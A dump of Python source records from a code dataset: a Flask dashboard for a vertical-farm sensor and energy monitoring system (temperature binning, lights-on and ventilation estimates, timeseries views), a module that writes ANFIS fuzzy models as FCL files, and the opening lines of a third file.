    "FrontFarm": [0.0, 18.0, 21.0, 25.0, 144.0],
    "Fridge": [0.0, 20.0, 23.0, 25.0, 144.0],
    "MidFarm": [0.0, 20.0, 23.0, 25.0, 144.0],
    "BackFarm": [0.0, 20.0, 25.0, 28.0, 144.0],
    "Tunnel": [0.0, 20.0, 25.0, 28.0, 144.0],
    "R&D": [0.0, 20.0, 23.0, 25.0, 144.0],
}
# TODO Read these from the database.
# Maps sensor_id -> TEMP_BINS zone key. (Name is a typo for
# "SENSOR_CATEGORIES"; kept because it is referenced by this name below.)
SENSOR_CATEORIES = {
    18: "MidFarm",
    19: "Tunnel",
    20: "Propagation",
    21: "FrontFarm",
    22: "BackFarm",
    23: "MidFarm",
    24: "R&D",
    25: "R&D",
    26: "Fridge",
    27: "MidFarm",
    48: "Propagation",
    49: "R&D",
}
# Ventilation constants
CONST_SFP = 2.39  # specific fan power
CONST_VTOT = 20337.0  # total volume – m3
DEFAULT_SENSOR_TYPE = "Aranet T&RH"
# Some data that varies based on sensor type.
# DATA_TABLES_BY_SENSOR_TYPE names the table/subquery for the readings; values
# are zero-argument callables so the (Flask-bound) query is built lazily.
DATA_TABLES_BY_SENSOR_TYPE = {
    "Aranet T&RH": lambda: queries.trh_with_vpd(db.session).subquery().c,
    "Aranet CO2": lambda: ReadingsAranetCO2Class,
    "Aranet Air Velocity": lambda: ReadingsAranetAirVelocityClass,
    "Aegis II": lambda: ReadingsAegisIrrigationClass,
}
# DATA_COLUMNS_BY_SENSOR_TYPE names the columns of that table that we want to plot as
# data, and gives them human friendly names to display on the UI.
# TODO Could the below data be read from the database?
DATA_COLUMNS_BY_SENSOR_TYPE = {
    "Aranet T&RH": [
        {"column_name": "temperature", "ui_name": "Temperature (°C)"},
        {"column_name": "humidity", "ui_name": "Humidity (%)"},
        {"column_name": "vpd", "ui_name": "VPD (Pa)"},
    ],
    "Aranet CO2": [
        {"column_name": "co2", "ui_name": "CO2 (ppm)"},
    ],
    "Aranet Air Velocity": [
        {"column_name": "air_velocity", "ui_name": "Air velocity (m/s)"},
    ],
    "Aegis II": [
        {"column_name": "temperature", "ui_name": "Temperature (°C)"},
        {"column_name": "pH", "ui_name": "pH"},
        {"column_name": "dissolved_oxygen", "ui_name": "Dissolved oxygen (%)"},
        {"column_name": "conductivity", "ui_name": "Conductivity (μS)"},
        {"column_name": "turbidity", "ui_name": "Turbidity"},
        {"column_name": "peroxide", "ui_name": "Peroxide (ppm)"},
    ],
}
# The above constants are defined in terms of names of the sensor_types. The code
# operates in terms of ids rather than names, so we wrap the above dictionaries into
# functions.
def get_sensor_type_name(sensor_type_id):
    """Given a sensor type ID, get the name of the sensor type from the database."""
    name_query = db.session.query(TypeClass.sensor_type).filter(
        TypeClass.id == sensor_type_id
    )
    row = db.session.execute(name_query).fetchone()
    # fetchone returns a Row (iterable) or None; unwrap the former.
    return row[0] if isinstance(row, Iterable) else row
def get_sensor_type_id(sensor_type_name):
    """Given a sensor type name, get the ID of the sensor type from the database."""
    id_query = db.session.query(TypeClass.id).filter(
        TypeClass.sensor_type == sensor_type_name
    )
    row = db.session.execute(id_query).fetchone()
    # fetchone returns a Row (iterable) or None; unwrap the former.
    return row[0] if isinstance(row, Iterable) else row
def get_table_by_sensor_type(sensor_type_id):
    """Return the SQLAlchemy table/subquery corresponding to a given sensor type ID.

    The global dict stores zero-argument callables (so Flask-bound
    queries are built lazily); the callable is memoised under the
    numeric ID so later look-ups skip the name resolution, and a
    ``lambda: None`` is cached for unknown types.
    """
    global DATA_TABLES_BY_SENSOR_TYPE
    if sensor_type_id not in DATA_TABLES_BY_SENSOR_TYPE:
        type_name = get_sensor_type_name(sensor_type_id)
        factory = DATA_TABLES_BY_SENSOR_TYPE.get(type_name, lambda: None)
        DATA_TABLES_BY_SENSOR_TYPE[sensor_type_id] = factory
    return DATA_TABLES_BY_SENSOR_TYPE[sensor_type_id]()
def get_columns_by_sensor_type(sensor_type_id):
    """Return the names of the data columns in the table corresponding to a given
    sensor type ID.

    By "data columns" we mean the ones that depend on the sensor type and hold
    the actual data, e.g. temperature and humidity, but not timestamp. Each
    return value is a dict with "column_name" (database name) and "ui_name"
    (human-readable name for the UI). Unknown types are cached as None.
    """
    global DATA_COLUMNS_BY_SENSOR_TYPE
    if sensor_type_id not in DATA_COLUMNS_BY_SENSOR_TYPE:
        type_name = get_sensor_type_name(sensor_type_id)
        # Memoise under the numeric ID; .get() yields None for unknown names.
        DATA_COLUMNS_BY_SENSOR_TYPE[sensor_type_id] = (
            DATA_COLUMNS_BY_SENSOR_TYPE.get(type_name)
        )
    return DATA_COLUMNS_BY_SENSOR_TYPE[sensor_type_id]
def get_default_sensor_type():
    """Return the database ID of the default sensor type (Aranet T&RH)."""
    default_type_id = get_sensor_type_id(DEFAULT_SENSOR_TYPE)
    return default_type_id
def is_valid_sensor_type(sensor_type_id):
    """Return True if we have the metadata (table and columns) needed for
    fetching and plotting data for the given sensor type, otherwise False.
    """
    if get_table_by_sensor_type(sensor_type_id) is None:
        return False
    return get_columns_by_sensor_type(sensor_type_id) is not None
# # # DONE WITH GLOBAL CONSTANTS AND SENSOR TYPE METADATA, BEGIN MAIN CONTENT # # #
def resample(df, bins, dt_from, dt_to):
    """
    Resamples (adds missing date/temperature bin combinations) to a dataframe.

    Arguments:
        df: dataframe with columns "date", "temp_bin", "temp_cnt"
        bins: temperature bin edges as a list of floats
        dt_from: date range from
        dt_to: date range to
    Returns:
        bins_list: a list of temperature bin labels
        df_list: a list of dataframes ("date", "temp_cnt"), one per bin
    """
    bins_list = [
        "(%.1f, %.1f]" % (bins[i], bins[i + 1]) for i in range(len(bins) - 1)
    ]
    date_min = min(df["date"].min(), dt_from)
    date_max = max(df["date"].max(), dt_to)
    # Collect all missing (day, bin) rows and concatenate once:
    # DataFrame.append was removed in pandas 2.0, and appending inside
    # the loop was quadratic anyway.
    existing = set(zip(df["date"], df["temp_bin"]))
    missing = []
    for n in range(int((date_max - date_min).days) + 1):
        day = date_min + timedelta(n)
        for temp_range in bins_list:
            if (day, temp_range) not in existing:
                missing.append(
                    {"date": day, "temp_bin": temp_range, "temp_cnt": 0}
                )
    if missing:
        df = pd.concat([df, pd.DataFrame(missing)], ignore_index=True)
    df = df.sort_values(by=["date", "temp_bin"], ascending=True)
    df.reset_index(inplace=True, drop=True)
    df_list = []
    for bin_range in bins_list:
        # .copy() so deleting the column doesn't warn about a slice view.
        df_bin = df[df["temp_bin"] == bin_range].copy()
        del df_bin["temp_bin"]
        df_bin.reset_index(inplace=True, drop=True)
        df_list.append(df_bin)
    return bins_list, df_list
def lights_energy_use(dt_from_, dt_to_):
    """
    Energy use from Carpenter's place (with lights - called Clapham in the database)

    Arguments:
        dt_from_: date range from
        dt_to_: date range to
    Returns:
        lights_results_df - a pandas dataframe with mean lights on values
    """
    # "Energy days" run from mid-afternoon to the next day, so widen the raw
    # query window beyond the requested dates.
    dt_from = pd.to_datetime(dt_from_.date()) + timedelta(hours=14)
    dt_to = pd.to_datetime(dt_to_.date()) + timedelta(days=1, hours=15)
    d_from = pd.to_datetime(dt_from_.date())
    d_to = pd.to_datetime(dt_to_.date())
    col_ec = "electricity_consumption"
    sensor_device_id = "Clapham"
    lights_on_cols = []
    # getting energy data for the analysis
    query = db.session.query(
        ReadingsEnergyClass.timestamp,
        ReadingsEnergyClass.electricity_consumption,
    ).filter(
        and_(
            SensorClass.device_id == sensor_device_id,
            ReadingsEnergyClass.sensor_id == SensorClass.id,
            ReadingsEnergyClass.timestamp >= dt_from,
            ReadingsEnergyClass.timestamp <= dt_to,
        )
    )
    df = pd.read_sql(query.statement, query.session.bind)
    if df.empty:
        return pd.DataFrame({"date": [], "mean_lights_on": []})
    # Sort chronologically. (The previous chained
    # sort_values(...).reset_index(inplace=True) discarded the sorted copy,
    # leaving the frame unsorted for the shift()-based dE calculation below.)
    df = df.sort_values(by=["timestamp"], ascending=True).reset_index(drop=True)
    # grouping data by date-hour
    energy_hour = (
        df.groupby(
            by=[
                df["timestamp"].map(
                    lambda x: pd.to_datetime(
                        "%04d-%02d-%02d-%02d" % (x.year, x.month, x.day, x.hour),
                        format="%Y-%m-%d-%H",
                    )
                ),
            ]
        )["electricity_consumption"]
        .sum()
        .reset_index()
    )
    # Sorting by hour (fixed no-op chained inplace reset_index here too).
    energy_hour = energy_hour.sort_values(by=["timestamp"], ascending=True).reset_index(
        drop=True
    )
    # energy dates. Energy date starts from 4pm each day and lasts for 24 hours
    energy_hour.loc[
        energy_hour["timestamp"].dt.hour < 15, "energy_date"
    ] = pd.to_datetime((energy_hour["timestamp"] + timedelta(days=-1)).dt.date)
    energy_hour.loc[
        energy_hour["timestamp"].dt.hour >= 15, "energy_date"
    ] = pd.to_datetime(energy_hour["timestamp"].dt.date)
    # Classification of lights being on
    # Lights ON 1: Lights turn on at 4pm and turn off at 9am, as scheduled.
    energy_hour["lights_on_1"] = energy_hour["timestamp"].apply(
        lambda x: 1 if (x.hour >= 17 or x.hour < 10) else 0
    )
    lights_on_cols.append("lights_on_1")
    # Lights ON 2: Lights are calculated by estimating the lighting use as between
    # the minima of two consecutive days. The lights are considered on when the
    # energy use is above the day's first quartile of lighting of this difference.
    # energy_hour['lights_on_2'] = 0
    # lights_on_cols.append('lights_on_2')
    # Lights ON 3: Lights are assumed to be on if the energy demand is over 30 kW
    # (max load of the extraction fan)
    energy_hour["lights_on_3"] = energy_hour[col_ec].apply(
        lambda x: 1 if (x > 30.0) else 0
    )
    lights_on_cols.append("lights_on_3")
    # Lights ON 4: Lights are assumed to turn on at the time of largest energy use
    # increase in the day, and turn off at the time of largest energy decrease of
    # the day.
    # estimating energy difference
    energy_hour["dE"] = energy_hour[col_ec] - energy_hour[col_ec].shift(1)
    energy_hour["dE"] = energy_hour["dE"].fillna(0.0)
    # finding max increase and min decrease
    energy_hour["dE_min"] = energy_hour.groupby("energy_date")["dE"].transform("min")
    energy_hour["dE_max"] = energy_hour.groupby("energy_date")["dE"].transform("max")
    energy_hour.loc[
        np.isclose(energy_hour["dE_max"], energy_hour["dE"]), "lights_on_4"
    ] = 1
    energy_hour.loc[
        np.isclose(energy_hour["dE_min"], energy_hour["dE"]), "lights_on_4"
    ] = 0
    # Manual forward-fill of lights_on_4 between the on/off anchor hours.
    prev_row_value = None
    for df_index in energy_hour.index:
        if df_index > 0:
            if np.isnan(energy_hour.loc[df_index, "lights_on_4"]) and not np.isnan(
                prev_row_value
            ):
                energy_hour.loc[df_index, "lights_on_4"] = prev_row_value
        prev_row_value = energy_hour.loc[df_index, "lights_on_4"]
    lights_on_cols.append("lights_on_4")
    # Lights ON 5: Lights are assumed on if the energy use is over 0.9
    # times the days' energy use mean, and the energy demand is over 30 kW.
    energy_hour["energy_date_mean"] = energy_hour.groupby("energy_date")[
        col_ec
    ].transform("mean")
    energy_hour["lights_on_5"] = np.where(
        (energy_hour[col_ec] > 30.0)
        & (energy_hour[col_ec] > 0.9 * energy_hour["energy_date_mean"]),
        1,
        0,
    )
    lights_on_cols.append("lights_on_5")
    # getting the mean value of lights on per day
    energy_date_df = energy_hour.loc[
        (energy_hour["energy_date"] >= d_from) & (energy_hour["energy_date"] <= d_to)
    ]
    energy_date_df = (
        energy_date_df.groupby(by=["energy_date"])[lights_on_cols].sum().reset_index()
    )
    energy_date_df["mean_lights_on"] = energy_date_df[lights_on_cols].sum(axis=1) / len(
        lights_on_cols
    )
    energy_date_df["date"] = energy_date_df["energy_date"].dt.strftime("%Y-%m-%d")
    lights_results_df = energy_date_df[["date", "mean_lights_on"]]
    return lights_results_df
def ventilation_energy_use(dt_from, dt_to):
    """
    In our data this is called Carpenter’s Place. This reading only counts energy use for
    the second extraction fan.

    Arguments:
        dt_from: date range from
        dt_to: date range to
    Returns:
        ventilation_results_df - a pandas dataframe with ventilation analysis results
    """
    sensor_device_id = "1a Carpenters Place"
    # getting energy data for the analysis
    query = db.session.query(
        ReadingsEnergyClass.timestamp,
        ReadingsEnergyClass.electricity_consumption,
    ).filter(
        and_(
            SensorClass.device_id == sensor_device_id,
            ReadingsEnergyClass.sensor_id == SensorClass.id,
            ReadingsEnergyClass.timestamp >= dt_from,
            ReadingsEnergyClass.timestamp <= dt_to,
        )
    )
    df = pd.read_sql(query.statement, query.session.bind)
    if df.empty:
        return pd.DataFrame({"timestamp": [], "ach": []})
    # Sort chronologically. (The previous chained
    # sort_values(...).reset_index(inplace=True) discarded the sorted copy.)
    df = df.sort_values(by=["timestamp"], ascending=True).reset_index(drop=True)
    # grouping data by date-hour
    energy_hour = (
        df.groupby(
            by=[
                df["timestamp"].map(
                    lambda x: "%04d-%02d-%02d %02d:00"
                    % (x.year, x.month, x.day, x.hour)
                ),
            ]
        )["electricity_consumption"]
        .sum()
        .reset_index()
    )
    # Sorting by the date-hour string (lexicographic == chronological here);
    # same no-op-sort fix as above.
    energy_hour = energy_hour.sort_values(by=["timestamp"], ascending=True).reset_index(
        drop=True
    )
    # Calculating air exchange per hour from fan energy, using the specific
    # fan power and half the total farm volume.
    energy_hour["ach"] = (
        energy_hour["electricity_consumption"] / CONST_SFP * 3600.0 / (CONST_VTOT / 2.0)
    )
    ventilation_results_df = energy_hour[["timestamp", "ach"]]
    return ventilation_results_df
def aranet_trh_analysis(dt_from, dt_to):
    """
    Performs data analysis for Aranet Temperature+Relative Humidity sensors.

    Arguments:
        dt_from: date range from
        dt_to: date range to
    Returns:
        the (sensor count, JSON temperature-range data) pair produced by
        temperature_range_analysis
    """
    # Lazy %-style args so formatting is skipped when INFO is disabled.
    logging.info(
        "Calling aranet_trh_analysis with parameters %s %s",
        dt_from.strftime(CONST_TIMESTAMP_FORMAT),
        dt_to.strftime(CONST_TIMESTAMP_FORMAT),
    )
    readings_filter = and_(
        ReadingsAranetTRHClass.sensor_id == SensorClass.id,
        ReadingsAranetTRHClass.timestamp >= dt_from,
        ReadingsAranetTRHClass.timestamp <= dt_to,
    )
    query = db.session.query(
        ReadingsAranetTRHClass.timestamp,
        ReadingsAranetTRHClass.sensor_id,
        SensorClass.name,
        ReadingsAranetTRHClass.temperature,
        ReadingsAranetTRHClass.humidity,
    ).filter(readings_filter)
    df = pd.read_sql(query.statement, query.session.bind)
    logging.info("Total number of records found: %d", len(df.index))
    return temperature_range_analysis(df, dt_from, dt_to)
def temperature_range_analysis(temp_df, dt_from, dt_to):
    """
    Performs temperature range analysis on a given pandas dataframe.

    Arguments:
        temp_df: dataframe with timestamp, sensor_id, name, temperature columns
        dt_from: date range from
        dt_to: date range to
    Returns:
        number of sensors with binnable data, and a JSON string mapping each
        sensor id to its name, temperature bins and per-day bin counts
    """
    df = copy.deepcopy(temp_df)
    df_unique_sensors = df[["sensor_id", "name"]].drop_duplicates(["sensor_id", "name"])
    sensor_ids = df_unique_sensors["sensor_id"].tolist()
    sensor_names = df_unique_sensors["name"].tolist()
    # extracting date from datetime
    df["date"] = pd.to_datetime(df["timestamp"].dt.date)
    # Sort chronologically. (The previous chained
    # sort_values(...).reset_index(inplace=True) discarded the sorted copy.)
    df = df.sort_values(by=["timestamp"], ascending=True).reset_index(drop=True)
    data_by_sensor_id = {}
    for sensor_name, sensor_id in zip(sensor_names, sensor_ids):
        df_sensor = df[df["sensor_id"] == sensor_id]
        # grouping data by date-hour and sensor id
        sensor_grp = df_sensor.groupby(
            by=[
                df_sensor.timestamp.map(
                    lambda x: "%04d-%02d-%02d-%02d" % (x.year, x.month, x.day, x.hour)
                ),
                "date",
            ]
        )
        # estimating hourly temperature mean values
        sensor_grp_temp = sensor_grp["temperature"].mean().reset_index()
        try:
            bins = TEMP_BINS[SENSOR_CATEORIES[sensor_id]]
        except KeyError:
            logging.error(
                f"Don't know how to categorise or bin sensor {sensor_id} "
                "in the dashboard."
            )
            continue
        # binning temperature values
        sensor_grp_temp["temp_bin"] = pd.cut(sensor_grp_temp["temperature"], bins)
        # converting bins to str
        sensor_grp_temp["temp_bin"] = sensor_grp_temp["temp_bin"].astype(str)
        # get bin counts for each sensor-day combination
        sensor_grp_date = sensor_grp_temp.groupby(by=["date", "temp_bin"])
        sensor_cnt = sensor_grp_date["temperature"].count().reset_index()
        sensor_cnt.rename(columns={"temperature": "temp_cnt"}, inplace=True)
        # Adding missing date/temp_bin combos
        bins_list, df_list = resample(sensor_cnt, bins, dt_from, dt_to)
        data_by_sensor_id[sensor_id] = {
            "name": sensor_name,
            "bins": bins_list,
            # df_bin (not df) so the outer frame isn't shadowed.
            "data": [
                {
                    "date": df_bin["date"].dt.strftime("%Y-%m-%d").to_list(),
                    "count": df_bin["temp_cnt"].to_list(),
                }
                for df_bin in df_list
            ],
        }
    return len(data_by_sensor_id.keys()), json.dumps(data_by_sensor_id)
def fetch_sensor_data(dt_from, dt_to, sensor_type, sensor_ids):
    """Fetch readings for the given sensors and time window as a dataframe.

    Raises ValueError for sensor types we hold no table/column metadata for.
    """
    type_name = get_sensor_type_name(sensor_type)
    if not is_valid_sensor_type(sensor_type):
        raise ValueError(f"Don't know how to fetch data for sensor type {sensor_type}")
    table = get_table_by_sensor_type(sensor_type)
    value_columns = []
    for column_spec in get_columns_by_sensor_type(sensor_type):
        value_columns.append(getattr(table, column_spec["column_name"]))
    conditions = and_(
        table.sensor_id == SensorClass.id,
        table.timestamp >= dt_from,
        table.timestamp <= dt_to,
        table.sensor_id.in_(sensor_ids),
    )
    query = db.session.query(
        table.timestamp,
        table.sensor_id,
        SensorClass.name,
        *value_columns,
    ).filter(conditions)
    df = pd.read_sql(query.statement, query.session.bind)
    if type_name == "Aranet T&RH":
        # Two decimal places: our precision isn't infinite, and long floats
        # look really ugly on the front end.
        df.loc[:, "vpd"] = df.loc[:, "vpd"].round(2)
    return df
@blueprint.route("/aranet_trh_dashboard")
@login_required
def aranet_trh_dashboard():
    """Render the Aranet temperature & relative-humidity dashboard.

    Reads the "range" query-string argument to determine the date window,
    runs the temperature-binning analysis, and passes the resulting JSON to
    the template.
    """
    dt_from, dt_to = parse_date_range_argument(request.args.get("range"))
    # aranet_trh_analysis returns (number of sensors, JSON of binned temps).
    num_sensors, temperature_bins_json = aranet_trh_analysis(dt_from, dt_to)
    return render_template(
        "aranet_trh_dashboard.html",
        num_sensors=num_sensors,
        temperature_bins_json=temperature_bins_json,
        # Human-readable dates for the page header, e.g. "January 01, 2024".
        dt_from=dt_from.strftime("%B %d, %Y"),
        dt_to=dt_to.strftime("%B %d, %Y"),
    )
@blueprint.route("/energy_dashboard")
@login_required
def energy_dashboard():
    """Render the energy-use dashboard.

    Combines the lights-on and ventilation energy analyses for the requested
    date range into a single JSON array consumed by the template.
    """
    dt_from, dt_to = parse_date_range_argument(request.args.get("range"))
    # lights-on analysis
    lights_json = lights_energy_use(dt_from, dt_to).to_json(orient="records")
    # ventilation analysis
    ventilation_json = ventilation_energy_use(dt_from, dt_to).to_json(
        orient="records"
    )
    # Both record arrays are wrapped into one top-level JSON array.
    energy_data = {"data": f"[{lights_json},{ventilation_json}]"}
    return render_template(
        "energy_dashboard.html",
        energy_data=energy_data,
        dt_from=dt_from.strftime("%B %d, %Y"),
        dt_to=dt_to.strftime("%B %d, %Y"),
    )
# # # TIMESERIES DASHBOARD # # #
def add_mean_over_sensors(sensor_type, sensor_ids, df, roll_window_minutes=10):
    """Take the dataframe for timeseries, and add data for a new "sensor" that's the
    mean of all the ones in the data
    """
    # NOTE(review): sensor_ids is currently unused here; the mean is taken over
    # whatever sensors are present in df.
    if len(df) == 0:
        return df
    # NOTE(review): df carries a non-numeric "name" column (see fetch_sensor_data);
    # newer pandas versions raise on .mean() over non-numeric columns unless
    # numeric_only is passed -- confirm against the pandas version in use.
    df_mean = df.groupby("timestamp").mean()
    # Label the synthetic rows so they render as a sensor called "mean".
    df_mean.loc[:, "sensor_id"] = "mean"
    df_mean.loc[:, "name"] = "mean"
    # The sensor data comes with a 10 minute frequency. However, the sensors may be
    # "phase shifted" with respect to each other, e.g. one may have data for 00 and 10,
    # while another may have 05 and 15. A 10 minute rolling mean smooths out these
    # differences.
    roll_window = timedelta(minutes=roll_window_minutes)
    for column in get_columns_by_sensor_type(sensor_type):
        column_name = column["column_name"]
        df_mean[column_name] = df_mean[column_name].rolling(roll_window).mean()
    df_mean = df_mean.reset_index()
    # Mean rows are concatenated first so the "mean" series appears first.
    df = pd.concat((df_mean, df), axis=0)
    return df
def fetch_all_sensor_types():
    """Get all sensor types from the CROP database, for which we know how to
    render the timeseries dashboard.

    Arguments:
        None

    Returns:
        List of dictionaries with keys "id" (int) and "sensor_type" (str).
    """
    type_query = db.session.query(
        TypeClass.id,
        TypeClass.sensor_type,
    )
    rows = query_result_to_array(db.session.execute(type_query).fetchall())
    # Keep only the types the dashboard knows how to render.
    return [row for row in rows if is_valid_sensor_type(row["id"])]
def fetch_all_sensors(sensor_type):
    """Get all sensors of a given sensor type from the CROP database.

    Arguments:
        sensor_type: The database ID (primary key) of the sensor type.

    Returns:
        Dict mapping sensor id (int) to a dict with keys "id", "aranet_code"
        and "name".  Entries are inserted in ascending order of id, so
        iteration over the dict is id-sorted.
    """
    # DOC FIX: the previous docstring claimed a list was returned, but callers
    # receive a dict keyed by sensor id.
    query = db.session.query(
        SensorClass.id,
        SensorClass.aranet_code,
        SensorClass.name,
    ).filter(SensorClass.type_id == sensor_type)
    sensors = db.session.execute(query).fetchall()
    sensors = query_result_to_array(sensors)
    # Dicts preserve insertion order, so sorting before building the dict
    # yields ascending-id iteration order.
    sensors = {s["id"]: s for s in sorted(sensors, key=lambda x: x["id"])}
    return sensors
@blueprint.route("/timeseries_dashboard", methods=["GET", "POST"])
@login_required
def timeseries_dashboard():
    """Render (or export) the timeseries dashboard.

    Query-string parameters: startDate/endDate (YYYYMMDD), sensorIds
    (comma/space/semicolon-separated ints) and sensorType (int).  With an
    incomplete parameter set, only the selector version of the page is
    rendered.  A POST with a complete parameter set downloads the data as
    CSV instead of rendering the page.
    """
    # Read query string
    dt_from = request.args.get("startDate")
    dt_to = request.args.get("endDate")
    sensor_ids = request.args.get("sensorIds")
    if sensor_ids is not None:
        # sensor_ids is passed as a comma-separated (or space or semicolon, although
        # those aren't currently used) string of ints, split it into a list of ints.
        sensor_ids = tuple(map(int, re.split(r"[ ;,]+", sensor_ids.rstrip(" ,;"))))
    sensor_type = request.args.get("sensorType")
    if sensor_type is None:
        sensor_type = get_default_sensor_type()
    else:
        sensor_type = int(sensor_type)
    # Get the data from the database that will be required in all scenarios for how the
    # page might be rendered.
    sensor_types = fetch_all_sensor_types()
    all_sensors = fetch_all_sensors(sensor_type)
    # If we don't have the information necessary to plot data for sensors, just render
    # the selector version of the page.
    if (
        dt_from is None
        or dt_to is None
        or sensor_ids is None
        or not is_valid_sensor_type(sensor_type)
    ):
        # Default the date pickers to the last week.
        today = datetime.today()
        dt_from = today - timedelta(days=7)
        dt_to = today
        return render_template(
            "timeseries_dashboard.html",
            sensor_type=sensor_type,
            sensor_types=sensor_types,
            all_sensors=all_sensors,
            sensor_ids=sensor_ids,
            dt_from=dt_from,
            dt_to=dt_to,
            data=dict(),
            summaries=dict(),
            data_columns=[],
        )
    # Convert datetime strings to objects and make dt_to run to the end of the day in
    # question.
    dt_from = datetime.strptime(dt_from, "%Y%m%d")
    dt_to = (
        datetime.strptime(dt_to, "%Y%m%d")
        + timedelta(days=1)
        + timedelta(milliseconds=-1)
    )
    df = fetch_sensor_data(dt_from, dt_to, sensor_type, sensor_ids)
    # POST means "download the data as CSV" rather than "render the page".
    if request.method == "POST":
        df = df.sort_values("timestamp")
        return download_csv(df, "timeseries")
    data_keys = list(sensor_ids)
    if len(sensor_ids) > 1:
        df = add_mean_over_sensors(sensor_type, sensor_ids, df)
        # Insert at start, to make "mean" be the first one displayed on the page.
        data_keys.insert(0, "mean")
    data_columns = get_columns_by_sensor_type(sensor_type)
    data_dict = dict()
    summary_dict = dict()
    # Build one record-list and one summary table per sensor (plus "mean").
    for key in data_keys:
        df_key = (
            df[df["sensor_id"] == key]
            .drop(columns=["sensor_id", "name"])
            .sort_values("timestamp")
        )
        # You may wonder, why we first to_json, and then json.loads. That's just to have
        # the data in a nice nested dictionary that a final json.dumps can deal with.
        data_dict[key] = json.loads(df_key.to_json(orient="records", date_format="iso"))
        # Round the summary stats to two decimals, for nice front end presentation.
        summary_dict[key] = json.loads(df_key.describe().round(2).to_json())
    return render_template(
        "timeseries_dashboard.html",
        sensor_type=sensor_type,
        sensor_types=sensor_types,
        all_sensors=all_sensors,
        sensor_ids=sensor_ids,
        dt_from=dt_from,
        dt_to=dt_to,
        data=data_dict,
        summaries=summary_dict,
        data_columns=data_columns,
    )
|
15,613 | 2b6f0209ed75d010b59fab2fdfdc309e817502d3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
ANFIS in torch: read/write an Anfis system as a FCL file.
I'm not fully sure how FCL deals with TSK antecedents, if at all.
The proper FCL specification is IEC document 61131-7,
but I'm working from Committee Draft CD 1.0 (Rel. 19 Jan 97).
http://www.fuzzytech.com/binaries/ieccd1.pdf
@author: James Power <james.power@mu.ie> June 4, 2019
'''
import sys
_COMMENT = '//'
_INDENT = ' '
_BLANKLINE = '\n'
_SEMIC = ';' # Make this empty if you don't want a semic at the end of lines
_CONJ_STR = ' AND ' # Join antecedent and consequent clauses
_VARTYPE = 'REAL' # Type of the input/output variables
_TSK_COEFF = 'Linear' # How I list TSK-style coefficients in the MFs
def _in_mf_def(mfdef):
'''
Define bespoke translations for the membership functions.
Return a string with the MF name and parameters.
Based on the jfuzzylogic names,
http://jfuzzylogic.sourceforge.net/html/manual.html#membership
'''
cname = mfdef.__class__.__name__
if cname == 'GaussMembFunc':
return 'gauss {} {}'.format(mfdef.mu, mfdef.sigma)
elif cname == 'BellMembFunc':
return'gbell {} {} {}'.format(mfdef.a, mfdef.b, mfdef.c)
elif cname == 'TriangularMembFunc':
return'trian {} {} {}'.format(mfdef.a, mfdef.b, mfdef.c)
elif cname == 'TrapezoidalMembFunc':
return'trape {} {} {} {}'.format(mfdef.a, mfdef.b, mfdef.c, mfdef.d)
else:
return mfdef.pretty()
def _out_mf_def(rule):
    '''
    This is how we represent an output (TSK) membership function:
    the coefficient label followed by the rule's coefficients.
    '''
    coeffs = ' '.join(str(coeff) for coeff in rule.tolist())
    return '{} {}'.format(_TSK_COEFF, coeffs)
def _out_mf_name(outnum, rnum):
'''
Return a made-up name for an output variable's MF (for this rule)
'''
return 'LINE_{}_{}'.format(outnum, rnum)
def _show_antecedents(rules, invars):
    '''
    Depict the rule antecedents as "v1 is mf1 AND v2 is mf2 AND ..."
    Return a list with one entry per rule.
    '''
    row_ants = []
    # rules.mf_indices has one row per rule; each row holds, per input
    # variable, the index of the membership function that rule uses.
    for rule_idx in rules.mf_indices:
        thisrule = []
        for (varname, fv), i in zip(invars, rule_idx):
            # Look up the i-th MF name of this fuzzy variable.
            thisrule.append('{} is {}'
                            .format(varname, list(fv.mfdefs.keys())[i]))
        row_ants.append(_CONJ_STR.join(thisrule))
    return row_ants
def show(model, fh=sys.stdout):
    '''
    Write a text representation of a model to stdout or given filehandle.
    Output follows the FUNCTION_BLOCK structure of FCL (IEC 61131-7):
    variable declarations, FUZZIFY/DEFUZZIFY blocks, then one RULEBLOCK.
    '''
    print('FUNCTION_BLOCK', _COMMENT, model.description, file=fh)
    print(_BLANKLINE, file=fh)
    # Input variables and MFs:
    invars = model.input_variables()
    print('VAR_INPUT', file=fh)
    for varname, _ in invars:
        print(_INDENT, '{} : {}'.format(varname, _VARTYPE), _SEMIC, file=fh)
    print('END_VAR', _BLANKLINE, file=fh)
    # One FUZZIFY block per input variable, listing its membership terms.
    for varname, fv in invars:
        print('FUZZIFY', varname, file=fh)
        for mfname, mfdef in fv.members():
            print(_INDENT, 'TERM {} := {}'.format(mfname, _in_mf_def(mfdef)),
                  _SEMIC, file=fh)
        print('END_FUZZIFY', _BLANKLINE, file=fh)
    print(_BLANKLINE, file=fh)
    # Output variables and rule coefficients:
    onames = model.output_variables()
    print('VAR_OUTPUT', file=fh)
    for varname in onames:
        print(_INDENT, '{} : {}'.format(varname, _VARTYPE), _SEMIC, file=fh)
    print('END_VAR', _BLANKLINE, file=fh)
    # One TSK "term" per (output, rule) pair, named LINE_<out>_<rule>.
    for outnum, outvar in enumerate(onames):
        print('DEFUZZIFY', outvar, file=fh)
        for rnum in range(model.coeff.shape[0]):
            mfname = _out_mf_name(outnum, rnum)
            mfdef = _out_mf_def(model.coeff[rnum][outnum])
            print(_INDENT, 'TERM LINE_{}_{} := {}'.format(
                outnum, rnum, mfdef), _SEMIC, file=fh)
        print('END_DEFUZZIFY', _BLANKLINE, file=fh)
    print(_BLANKLINE, file=fh)
    # Rules (all in one rule block)
    rule_ants = _show_antecedents(model.layer['rules'], invars)
    print('RULEBLOCK', file=fh)
    for rnum, rule in enumerate(model.coeff):
        print(_INDENT, 'RULE {}: IF {}'.format(rnum, rule_ants[rnum]), file=fh)
        conseq = []
        # Consequent: each output variable "is" its TSK term for this rule.
        for outnum, outvar in enumerate(rule):
            mfname = _out_mf_name(outnum, rnum)
            conseq.append('{} is {}'.format(onames[outnum], mfname))
        print(_INDENT*2, 'THEN {}'.format(_CONJ_STR.join(conseq)),
              _SEMIC, file=fh)
    print('END_RULEBLOCK', _BLANKLINE, file=fh)
    print(_BLANKLINE, file=fh)
    print('END_FUNCTION_BLOCK', file=fh)
def write(model, filename):
    '''
    Write a text representation of a model to the given file.
    '''
    with open(filename, 'w') as outfile:
        show(model, outfile)
    print('Written', filename)
|
15,614 | d4c0745eb77c4631347e51b988a93fb376fcedcf | import os
# Data Frame Columns
COUNT = "count"
CNT_DOWN = "cnt_down" # Count of -1s present
CNT_GROUP = "cnt_group" # Count of members in the same group
